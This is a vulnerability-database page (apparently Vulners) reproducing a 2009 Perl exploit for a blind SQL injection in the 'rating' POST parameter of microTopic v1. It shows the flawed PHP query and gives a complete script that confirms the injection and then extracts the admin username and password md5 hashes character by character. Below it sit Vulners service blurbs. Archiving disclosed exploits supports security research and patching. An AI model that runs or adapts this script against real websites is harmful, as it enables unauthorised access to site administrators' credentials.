Vulners
Lucene search
microTopic 1 Blind SQL Injection
`#!/usr/bin/perl
#---------------------------------------------------------------------------
#(POST var 'rating') BLIND SQL INJECTION--microTopic v1 Initial Release-->
#---------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://sourceforge.net/projects/microtopic/
#-->DOWNLOAD: http://sourceforge.net/projects/microtopic/
#-->DEMO: N/A
#-->CATEGORY: CMS / Portal
#-->DESCRIPTION: Simple News / Opinion site with page ranking Lightweight at ~ 200kb
# Secure - Hashed challenge/response login Flexible...
#
#CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3.0.10
#-->DORK: "N/A"
#-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT
#-->AFFECT VERSION: v-1
#-->Discovered Bug date: 2009-05-08
#-->Reported Bug date: 2009-05-08
#-->Fixed bug date: 2009-05-10
#-->Info patch (v1.01): http://sourceforge.net/projects/microtopic/
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
#
#------------
#VULN FILES:
#------------
#
#Path --> [HOME_PATH]/admin/utopic.php
#
#It contents:
#
# $query="SELECT UNIX_TIMESTAMP(max(datum)) FROM {$my_table}_ip WHERE id='$_POST[rating]'
# AND ip='$_SERVER[REMOTE_ADDR]'";
# $sql=SendSQL($query);
#
#Path --> [HOME_PATH]/admin/mysql.php
#
#It contents:
#
#function SendSQL($query){
# $sql=mysql_query($query) or die("CANNOT ".$query);
# return $sql;
# }
#
#------------
#CONDITIONS:
#------------
#
#
#**magic quotes=off
#
#
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
#
#-------------------EOF---------------------------------->>>ENJOY IT!
#
use LWP::UserAgent;
use HTTP::Request;
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title microTopic v1 Initial Release (POST var 'rating') BLIND SQL Injection Exploit");
system ("color 02");
}
}
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $request = HTTP::Request -> new(POST => $_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] microTopic v1 Initial Release (POST var 'rating') BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [topic]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";
print "\t[XxX] [topic]: Valid topic. Opt: 1,2,3,4\n";
print "\t[XxX] Example: perl $0 'www.example.es' 'microtopic' '1'\n";
}
sub error {
print "\t-----------------------------------------------------------------\n";
print "\tWEB IS NOT VULNERABLE!\n";
print "\tMaybe --> \n";
print "\t1.-Patched\n";
print "\t2.-topic doesn't exist\n";
print "\t3.-Magic quotes ON\n";
print "\tEXPLOIT FAILED!\n";
print "\t-----------------------------------------------------------------\n";
}
sub testedblindsql {
print "\t-----------------------------------------------------------------\n";
print "\tWEB IS VULNERABLE!\n";
print "\tTested Blind SQL Injection.\n";
print "\tStarting exploit...Waiting...\n";
print "\t-----------------------------------------------------------------\n";
}
sub exploit {
my $result="";
$k=1;
$z=48;
while(($k<=32) && ($z<=126)){
$blindsqlpost="rate=1&rating=".$_[1]."'+AND+ascii(substring((SELECT+".$_[2]."+FROM+utopic_login+WHERE+loginid=1),".$k.",1))='".$z."&postedcounter=1&action=doit";
$output=&request($_[0],$blindsqlpost);
if ( $output =~ (/\<\/head\>\<body\>/))
{
$result=$result.chr($z);
$k++;
$z=47;
}
if($z==57)
{
$z=96;
}
#new char
$z++;
}
return $result;
}
#Main
&lw;
print "\t\t#########################################################\n\n";
print "\t\t#########################################################\n\n";
print "\t\t## microTopic v1 Initial Release - BSQLi Exploit ##\n\n";
print "\t\t## Author: Y3nh4ck3r ##\n\n";
print "\t\t## Condition: magic quotes=off ##\n\n";
print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t\t## Proud to be Spanish! ##\n\n";
print "\t\t#########################################################\n\n";
print "\t\t#########################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $topic=$ARGV[2];
#Build the uri
if($path eq "no-path"){
$finalhost="http://".$host."/index.php?topic=".$topic;
}else{
$finalhost="http://".$host."/".$path."/index.php?topic=".$topic;
}
#Check all variables needed
$numArgs = $#ARGV + 1;
if($numArgs<=2)
{
&helper;
exit(1);
}
$finalrequest = $finalhost;
#Testing blind sql injection
$blindsqlpost="rate=1&rating=".$topic."'+AND+1='0&postedcounter=1&action=doit"; #blind sql injection
$output=&request($finalrequest,$blindsqlpost);
if ( $output !~ (/\<\/head\>\<body\>/))
{
#blind sql injection is available
&testedblindsql;
}else{
#Not injectable
&error;
exit(1);
}
#Bruteforcing user...
$usernamehash=&exploit($finalrequest,$topic,'username');
#Bruteforcing pass...
$passhash=&exploit($finalrequest,$topic,'password');
print "\n\t\t*************************************************\n";
print "\t\t**** EXPLOIT EXECUTED WITH SUCCESS ****\n";
print "\t\t*************************************************\n\n";
print "\t\tUsername(md5 hash):".$usernamehash."\n";
print "\t\tPassword(md5 hash):".$passhash."\n\n";
print "\n\t\t<<----------------------FINISH!-------------------->>\n\n";
print "\t\t<<---------------Thanks to: y3hn4ck3r-------------->>\n\n";
print "\t\t<<------------------------EOF---------------------->>\n\n";
exit(1);
#Ok...all job done
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2009 00:00Current